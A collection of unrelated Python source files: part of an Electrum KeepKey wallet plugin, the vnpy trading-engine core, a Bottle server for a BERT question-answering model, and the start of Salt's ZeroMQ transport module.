"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub("m", 'standard'))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'KeepKey_KeyStore' = None):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_keepkey_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n.extend(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'KeepKey_KeyStore'):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.timestamp = tx.ntime
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for out in tx.outputs():
o = t.bin_outputs.add()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
engine.py
|
"""
"""
import logging
from logging import Logger
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData,
Exchange
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]) -> BaseGateway:
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self) -> List[str]:
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> None:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
Send cancel order request to a specific gateway. - L: ???
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.console_logging_level: int = 40
self.file_logging_level: int = 20
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.console_logging_level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y-%m-%d=%H-%M")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
print("Jinchao LogEngine - log file path: ", file_path)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.file_logging_level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid: str) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
serve.py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import signal
import uuid
from queue import Queue
from threading import Thread
import bottle
from tqdm import tqdm
from common import logger
from common import tf
from common.config import get_config_from_args
from common.util import batch
from tasks import get_task_model_class
bottle.BaseRequest.MEMFILE_MAX = 10 * 1024 * 1024
app = bottle.Bottle()
request_queue = Queue()
response_queue = Queue()
def serve(args):
config = get_config_from_args(args, mode='infer')
# tf.enable_eager_execution()
# tf.set_random_seed(config.random_seed)
checkpoint_path = tf.train.latest_checkpoint(config.checkpoint_dir)
# initialize model
sess = tf.Session()
model = get_task_model_class(config.model, config.task)(config)
feed_fn, output_tensors = model.infer_graph(config)
saver = tf.train.Saver(var_list=tf.global_variables())
saver.restore(sess, checkpoint_path)
logger.info("{} loaded, waiting for questions...".format(checkpoint_path))
while True:
msg = request_queue.get()
if msg is None:
break
# call model to do prediction
(request_id, model_id, inputs) = msg
logger.info("begin preprocessing on request={}".format(request_id))
outputs = []
input_features = model.text_to_feature(inputs, config)
logger.info("begin predicting on request={}".format(request_id))
total_batches = len(input_features) // args.batch_size
for batch_feature in tqdm(batch(input_features, args.batch_size),
total=total_batches):
feed = feed_fn(batch_feature)
# logger.info("{}: batch {} started...".format(request_id, idx))
model_outputs = sess.run(output_tensors, feed)
output = model.prepare_outputs(model_outputs, config,
batch_feature)
# logger.info("{}: batch {} done...".format(request_id, idx))
outputs.extend(output)
# prediction_answers = decode_answer(
# contexts, context_spans, start_predictions, end_predictions,
# output_char_start)
# all_answers.extend(prediction_answers)
# all_probabilities.extend([round(float(s), 6)
# for s in norm_scores])
logger.info("prediction for {} finished".format(request_id))
response_queue.put((request_id, model_id, outputs))
@app.post('/qa')
def add_message_to_queue():
user_request = bottle.request.json
user_request_id = user_request.get('request_id', uuid.uuid4().hex[:8])
request_model = user_request.get('model_name', 'bert')
user_input = user_request['input']
bottle_env = bottle.request.environ
client_ip = bottle_env.get('HTTP_X_FORWARDED_FOR') or bottle_env.get(
'REMOTE_ADDR')
logger.info("received request={}, model_name={}, from={}".format(
user_request_id, request_model, client_ip))
request_queue.put((user_request_id, request_model, user_input))
(request_id, model_name, output) = response_queue.get()
logger.info('sending results back to={} for request={}...'.format(
client_ip, request_id))
return {"request_id": request_id, "model_name": model_name,
"output": output}
def main(args):
prediction_worker = Thread(target=serve, args=(args,))
prediction_worker.daemon = True
prediction_worker.start()
def signal_handler(_signal, _frame):
print('You pressed Ctrl+C, exiting now...')
exit(0)
signal.signal(signal.SIGINT, signal_handler)
host = args.ip or 'localhost'
bottle.run(app, host=host, port=args.port)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-ip', '--ip', type=str, default=None,
help='ip to serve.')
parser.add_argument('-p', '--port', type=int, default=60005,
help='port to serve')
parser.add_argument('-c', '--config_file', type=str, default=None,
help='Path to qa model config')
parser.add_argument('-b', '--batch_size', type=int, default=48,)
parser.add_argument('-m', '--model', type=str, default='bert',
choices=('bert', 'ebert'),
help='choose model to load default configuration')
parser.add_argument('-t', '--task', type=str, default='squad_v1.1',
choices=('squad_v1.1', 'squad_v2.0', 'hotpot',
'mnli', 'qqp', 'boolq', 'race'),
help='choose model to load default configuration')
main(parser.parse_args())
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import
import os
import sys
import copy
import errno
import signal
import hashlib
import logging
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils
import salt.utils.verify
import salt.utils.event
import salt.utils.stringutils
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.exceptions import SaltReqTimeoutError
import zmq
import zmq.error
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
from salt.ext import six
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
class AsyncZeroMQReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to ZeroMQ.
ZMQ Channels default to 'crypt=aes'
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop')
if io_loop is None:
zmq.eventloop.ioloop.install()
io_loop = tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncZeroMQReqChannel for {0}'.format(key))
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
log.trace('Inserted key into loop_instance_map id {0} for key {1} and process {2}'.format(id(loop_instance_map), key, os.getpid()))
else:
log.debug('Re-using AsyncZeroMQReqChannel for {0}'.format(key))
return obj
def __deepcopy__(self, memo):
cls = self.__class__
result = cls.__new__(cls, copy.deepcopy(self.opts, memo)) # pylint: disable=too-many-function-args
memo[id(self)] = result
for key in self.__dict__:
if key in ('_io_loop',):
continue
# The _io_loop has a thread Lock which will fail to be deep
# copied. Skip it because it will just be recreated on the
# new copy.
if key == 'message_client':
# Recreate the message client because it will fail to be deep
# copied. The reason is the same as the io_loop skip above.
setattr(result, key,
AsyncReqMessageClientPool(result.opts,
args=(result.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop}))
continue
setattr(result, key, copy.deepcopy(self.__dict__[key], memo))
return result
@classmethod
def __key(cls, opts, **kwargs):
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop')
if self._io_loop is None:
zmq.eventloop.ioloop.install()
self._io_loop = tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
# we don't need to worry about auth as a kwarg, since its a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClientPool(self.opts,
args=(self.opts, self.master_uri,),
kwargs={'io_loop': self._io_loop})
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
# Return controle back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
if 'key' not in ret:
# Reauth in the case our key is deleted on the master side.
yield self.auth.authenticate()
ret = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60, raw=False):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(
self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
tries=tries,
)
# we may not have always data
# as for example for saltcall ret submission, this is a blind
# communication, we do not subscribe to return events, we just
# upload the results to the master
if data:
data = self.auth.crypticle.loads(data, raw)
if six.PY3 and not raw:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
# We did not get data back the first time. Retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(
self._package_load(load),
timeout=timeout,
tries=tries,
)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
